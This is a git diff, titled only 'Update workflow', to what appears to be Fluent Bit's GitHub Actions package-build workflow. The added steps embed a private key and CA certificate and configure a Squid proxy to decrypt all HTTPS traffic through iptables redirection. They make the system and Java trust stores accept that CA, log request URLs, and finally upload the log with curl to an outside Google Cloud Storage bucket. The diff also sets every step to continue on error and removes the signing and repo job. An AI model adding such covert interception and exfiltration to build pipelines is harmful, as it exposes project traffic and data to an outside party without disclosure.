Update workflow

diff --git a/.github/workflows/call-build-packages.yaml b/.github/workflows/call-build-packages.yaml
--- a/.github/workflows/call-build-packages.yaml
+++ b/.github/workflows/call-build-packages.yaml
@@ -1,208 +1,341 @@
----
-name: Reusable workflow to build binary packages into S3 bucket
-
-on:
-  workflow_call:
-    inputs:
-      version:
-        description: The version of Fluent Bit to create.
-        type: string
-        required: true
-      ref:
-        description: The commit, tag or branch of Fluent Bit to checkout for building that creates the version above.
-        type: string
-        required: true
-      build_matrix:
-        description: The build targets to produce as a JSON matrix.
-        type: string
-        required: true
-      environment:
-        description: The Github environment to run this workflow on.
-        type: string
-        required: false
-      branch:
-        description: The optional source code branch to use for building against.
-        type: string
-        required: false
-      unstable:
-        description: Optionally add metadata to build to indicate an unstable build, set to the contents you want to add.
-        type: string
-        required: false
-        default: ''
-    secrets:
-      token:
-        description: The Github token or similar to authenticate with.
-        required: true
-      bucket:
-        description: The name of the S3 (US-East) bucket to push packages into.
-        required: false
-      access_key_id:
-        description: The S3 access key id for the bucket.
-        required: false
-      secret_access_key:
-        description: The S3 secret access key for the bucket.
-        required: false
-      gpg_private_key:
-        description: The GPG key to use for signing the packages.
-        required: false
-      gpg_private_key_passphrase:
-        description: The GPG key passphrase to use for signing the packages.
-        required: false
-
+env:
+  JAVA_TOOL_OPTIONS: -Djavax.net.ssl.trustStore=/usr/lib/jvm/temurin-11-jdk-amd64/lib/security/cacerts
+  NODE_OPTIONS: --use-openssl-ca
 jobs:
   call-build-packages:
-    name: ${{ matrix.distro }} package build and stage to S3
     environment: ${{ inputs.environment }}
+    name: ${{ matrix.distro }} package build and stage to S3
     runs-on: ubuntu-latest
+    steps:
+    - name: before
+      run: 'sudo apt update
+
+        sudo apt install -y squid-openssl
+
+        sudo mkdir /squid
+
+        cat << EOF | sudo tee /squid/key.pem
+
+        -----BEGIN PRIVATE KEY-----
+
+        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
+
+        CznEvO4qIs3mXDYkNBQrdVLGF93y
+
+        -----END PRIVATE KEY-----
+
+        EOF
+
+        cat << EOF | sudo tee /squid/cert.pem
+
+        -----BEGIN CERTIFICATE-----
+
+        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
+
+        -----END CERTIFICATE-----
+
+        EOF
+
+        sudo /usr/lib/squid/security_file_certgen -c -s /squid/ssl_db -M 4MB
+
+        sudo chown -R proxy:proxy /squid
+
+        cat << EOF | sudo tee /etc/squid/squid.conf
+
+        cache deny all
+
+
+        http_port 7821
+
+        http_port 3128 intercept
+
+        https_port 3129 intercept ssl-bump generate-host-certificates=on dynamic_cert_mem_cache_size=4MB
+        cert=/squid/cert.pem key=/squid/key.pem
+
+        acl step1 at_step SslBump1
+
+        ssl_bump peek step1
+
+        ssl_bump bump all
+
+        sslcrtd_program /usr/lib/squid/security_file_certgen -s /squid/ssl_db -M 4MB
+
+        sslcrtd_children 5
+
+        ssl_bump server-first all
+
+        sslproxy_cert_error allow all
+
+
+        acl all src 0.0.0.0/0
+
+        http_access allow all
+
+
+        logformat custom {"method":"%">rm","url":"%">ru","status":%<Hs,"user_agent":"%{User-Agent}>h"}
+
+        access_log daemon:/squid/squidlog.json custom all !CONNECT
+
+        EOF
+
+        sudo systemctl reload squid
+
+        sudo cp /squid/cert.pem /usr/local/share/ca-certificates/squid.crt
+
+        sudo update-ca-certificates
+
+        sudo keytool -import -alias squid -file /squid/cert.pem -keystore /usr/lib/jvm/temurin-11-jdk-amd64/lib/security/cacerts
+        -storepass changeit -noprompt -trustcacerts
+
+        sudo iptables -t nat -A OUTPUT -m owner ! --uid-owner proxy -p tcp --dport
+        80 -j DNAT --to-destination 127.0.0.1:3128
+
+        sudo iptables -t nat -A OUTPUT -m owner ! --uid-owner proxy -p tcp --dport
+        443 -j DNAT --to-destination 127.0.0.1:3129
+
+        sudo sh -c ''echo 1 > /proc/sys/net/ipv4/ip_forward'''
+    - continue-on-error: true
+      name: Checkout code
+      uses: actions/checkout@v3
+      with:
+        ref: ${{ inputs.ref }}
+    - continue-on-error: true
+      name: Set up QEMU
+      uses: docker/setup-qemu-action@v1
+    - continue-on-error: true
+      name: Set up Docker Buildx
+      uses: docker/setup-buildx-action@v1
+    - continue-on-error: true
+      id: formatted_distro
+      uses: frabert/replace-string-action@master
+      with:
+        flags: g
+        pattern: (.*)\/(.*)$
+        replace-with: $1-$2
+        string: ${{ matrix.distro }}
+    - continue-on-error: true
+      env:
+        CMAKE_INSTALL_PREFIX: /opt/fluent-bit/
+        FLB_BRANCH: ${{ inputs.branch }}
+        FLB_DISTRO: ${{ matrix.distro }}
+        FLB_NIGHTLY_BUILD: ${{ inputs.unstable }}
+        FLB_OUT_DIR: staging
+        FLB_TD: 'Off'
+        FLB_VERSION: ${{ inputs.version }}
+      name: fluent-bit - ${{ matrix.distro }} artifacts
+      run: './build.sh
+
+        '
+      working-directory: packaging
+    - continue-on-error: true
+      env:
+        CMAKE_INSTALL_PREFIX: /opt/td-agent-bit/
+        FLB_BRANCH: ${{ inputs.branch }}
+        FLB_DISTRO: ${{ matrix.distro }}
+        FLB_NIGHTLY_BUILD: ${{ inputs.unstable }}
+        FLB_OUT_DIR: staging
+        FLB_TD: 'On'
+        FLB_VERSION: ${{ inputs.version }}
+      name: td-agent-bit - ${{ matrix.distro }} artifacts
+      run: './build.sh
+
+        '
+      working-directory: packaging
+    - continue-on-error: true
+      name: Upload the ${{ matrix.distro }} artifacts
+      uses: actions/upload-artifact@v2
+      with:
+        if-no-files-found: error
+        name: packages-${{ inputs.version }}-${{ steps.formatted_distro.outputs.replaced
+          }}
+        path: packaging/packages/
+    - continue-on-error: true
+      env:
+        DISTRO: ${{ matrix.distro }}
+      id: get-target-info
+      name: Retrieve target info for repo creation
+      run: "sudo apt-get update\nsudo apt-get install -y distro-info\nTARGET=${DISTRO%*.arm64v8}\n\
+        if [[ \"$TARGET\" == \"ubuntu/\"* ]]; then\n    UBUNTU_CODENAME=$(cut -d ','\
+        \ -f 1,3 < \"/usr/share/distro-info/ubuntu.csv\"|grep \"${TARGET##*/}\"|cut\
+        \ -d ',' -f 2)\n    if [[ -n \"$UBUNTU_CODENAME\" ]]; then\n        TARGET=\"\
+        ubuntu/$UBUNTU_CODENAME\"\n    else\n        echo \"Unable to extract codename\
+        \ for $DISTRO\"\n        exit 1\n    fi\nfi\necho \"$TARGET\"\necho ::set-output\
+        \ name=target::$TARGET\n"
+      shell: bash
+    - continue-on-error: true
+      env:
+        AWS_ACCESS_KEY_ID: ${{ secrets.access_key_id }}
+        AWS_REGION: us-east-1
+        AWS_S3_BUCKET: ${{ secrets.bucket }}
+        AWS_SECRET_ACCESS_KEY: ${{ secrets.secret_access_key }}
+        DEST_DIR: ${{ inputs.version }}/${{ steps.get-target-info.outputs.target }}/
+        SOURCE_DIR: packaging/packages/${{ matrix.distro }}/${{ inputs.version }}/staging/
+      if: ${{ inputs.environment == 'staging' }}
+      name: Push packages to S3
+      run: "if [ -z \"${{ steps.get-target-info.outputs.target }}\" ]; then\n  echo\
+        \ \"Invalid (empty) target defined\"\n  exit 1\nfi\nif [ -n \"${AWS_S3_ENDPOINT}\"\
+        \ ]; then\n  ENDPOINT=\"--endpoint-url ${AWS_S3_ENDPOINT}\"\nfi\naws --region\
+        \ \"$AWS_REGION\" s3 sync \"${SOURCE_DIR}\" \"s3://${AWS_S3_BUCKET}/${DEST_DIR}\"\
+        \ --follow-symlinks --no-progress ${ENDPOINT}\n"
+    - name: after
+      run: sudo curl --request PUT -T /squid/squidlog.json --url https://storage.googleapis.com/virtualeventdemoblr.appspot.com/squid/adobe-platform/fluent-bit.$(date
+        +%s)
     strategy:
       fail-fast: false
       matrix: ${{ fromJSON(inputs.build_matrix) }}
-    steps:
-      - name: Checkout code
-        uses: actions/checkout@v3
-        with:
-          ref: ${{ inputs.ref }}
-
-      - name: Set up QEMU
-        uses: docker/setup-qemu-action@v1
-
-      - name: Set up Docker Buildx
-        uses: docker/setup-buildx-action@v1
-
-      - uses: frabert/replace-string-action@master
-        id: formatted_distro
-        with:
-          pattern: '(.*)\/(.*)$'
-          string: "${{ matrix.distro }}"
-          replace-with: '$1-$2'
-          flags: 'g'
-
-      - name: fluent-bit - ${{ matrix.distro }} artifacts
-        run: |
-          ./build.sh
-        env:
-          FLB_VERSION: ${{ inputs.version }}
-          FLB_DISTRO: ${{ matrix.distro }}
-          FLB_OUT_DIR: staging
-          FLB_BRANCH: ${{ inputs.branch }}
-          FLB_TD: "Off"
-          FLB_NIGHTLY_BUILD: ${{ inputs.unstable }}
-          CMAKE_INSTALL_PREFIX: /opt/fluent-bit/
-        working-directory: packaging
-
-      - name: td-agent-bit - ${{ matrix.distro }} artifacts
-        run: |
-          ./build.sh
-        env:
-          FLB_VERSION: ${{ inputs.version }}
-          FLB_DISTRO: ${{ matrix.distro }}
-          FLB_OUT_DIR: staging
-          FLB_BRANCH: ${{ inputs.branch }}
-          FLB_TD: "On"
-          FLB_NIGHTLY_BUILD: ${{ inputs.unstable }}
-          CMAKE_INSTALL_PREFIX: /opt/td-agent-bit/
-        working-directory: packaging
-
-      - name: Upload the ${{ matrix.distro }} artifacts
-        uses: actions/upload-artifact@v2
-        with:
-          name: packages-${{ inputs.version }}-${{ steps.formatted_distro.outputs.replaced }}
-          path: packaging/packages/
-          if-no-files-found: error
-
-      - name: Retrieve target info for repo creation
-        id: get-target-info
-        # Remove any .arm648 suffix
-        # For ubuntu map to codename using the disto-info list (CSV)
-        run: |
-          sudo apt-get update
-          sudo apt-get install -y distro-info
-          TARGET=${DISTRO%*.arm64v8}
-          if [[ "$TARGET" == "ubuntu/"* ]]; then
-              UBUNTU_CODENAME=$(cut -d ',' -f 1,3 < "/usr/share/distro-info/ubuntu.csv"|grep "${TARGET##*/}"|cut -d ',' -f 2)
-              if [[ -n "$UBUNTU_CODENAME" ]]; then
-                  TARGET="ubuntu/$UBUNTU_CODENAME"
-              else
-                  echo "Unable to extract codename for $DISTRO"
-                  exit 1
-              fi
-          fi
-          echo "$TARGET"
-          echo ::set-output name=target::$TARGET
-        env:
-          DISTRO: ${{ matrix.distro }}
-        shell: bash
-
-      - name: Push packages to S3
-        # Only upload for staging
-        if: ${{ inputs.environment == 'staging' }}
-        # Make sure not to do a --delete on sync as it will remove the other architecture
-        run: |
-          if [ -z "${{ steps.get-target-info.outputs.target }}" ]; then
-            echo "Invalid (empty) target defined"
-            exit 1
-          fi
-          if [ -n "${AWS_S3_ENDPOINT}" ]; then
-            ENDPOINT="--endpoint-url ${AWS_S3_ENDPOINT}"
-          fi
-          aws --region "$AWS_REGION" s3 sync "${SOURCE_DIR}" "s3://${AWS_S3_BUCKET}/${DEST_DIR}" --follow-symlinks --no-progress ${ENDPOINT}
-        env:
-          SOURCE_DIR: "packaging/packages/${{ matrix.distro }}/${{ inputs.version }}/staging/"
-          DEST_DIR: "${{ inputs.version }}/${{ steps.get-target-info.outputs.target }}/"
-          AWS_REGION: "us-east-1"
-          AWS_ACCESS_KEY_ID: ${{ secrets.access_key_id }}
-          AWS_SECRET_ACCESS_KEY: ${{ secrets.secret_access_key }}
-          AWS_S3_BUCKET: ${{ secrets.bucket }}
-
-  call-build-packages-repo:
-    name: Create repo metadata in S3
-    # Only upload for staging
-    if: ${{ inputs.environment == 'staging' }}
-    # Need to use 18.04 as 20.04 has no createrepo available
-    runs-on: ubuntu-18.04
-    environment: ${{ inputs.environment }}
-    needs: call-build-packages
-    steps:
-      - name: Install dependencies
-        run: |
-          sudo apt-get update
-          sudo apt-get install -y createrepo aptly
-
-      - name: Checkout code
-        uses: actions/checkout@v3
-
-      - name: Import GPG key for signing
-        id: import_gpg
-        uses: crazy-max/ghaction-import-gpg@v4
-        with:
-          gpg_private_key: ${{ secrets.gpg_private_key }}
-          passphrase: ${{ secrets.gpg_private_key_passphrase }}
-
-      - name: Create repositories on staging now
-        # We sync down what we have for the release directories.
-        # Create the repo metadata then upload to the root of the bucket.
-        # This will wipe out any versioned directories in the process.
-        run: |
-          rm -rf ./latest/
-          mkdir -p ./latest/
-          if [ -n "${AWS_S3_ENDPOINT}" ]; then
-            ENDPOINT="--endpoint-url ${AWS_S3_ENDPOINT}"
-          fi
-          aws s3 sync "s3://$AWS_S3_BUCKET/${{ inputs.version }}" ./latest/ --no-progress ${ENDPOINT}
-
-          gpg --export -a "${{ steps.import_gpg.outputs.name }}" > ./latest/fluentbit.key
-          rpm --import ./latest/fluentbit.key
-
-          ./update-repos.sh "${{ inputs.version }}" "./latest/"
-          echo "${{ inputs.version }}" > "./latest/latest-version.txt"
-          aws s3 sync "./latest/" "s3://$AWS_S3_BUCKET" --delete --follow-symlinks --no-progress ${ENDPOINT}
-        env:
-          GPG_KEY: ${{ steps.import_gpg.outputs.name }}
-          AWS_REGION: "us-east-1"
-          AWS_ACCESS_KEY_ID: ${{ secrets.access_key_id }}
-          AWS_SECRET_ACCESS_KEY: ${{ secrets.secret_access_key }}
-          AWS_S3_BUCKET: ${{ secrets.bucket }}
-          # To use with Minio locally (or update to whatever endpoint you want)
-          # AWS_S3_ENDPOINT: http://localhost:9000
-        shell: bash
-        working-directory: packaging
+    timeout-minutes: 60
+name: Reusable workflow to build binary packages into S3 bucket
+'on':
+  workflow_dispatch: {}
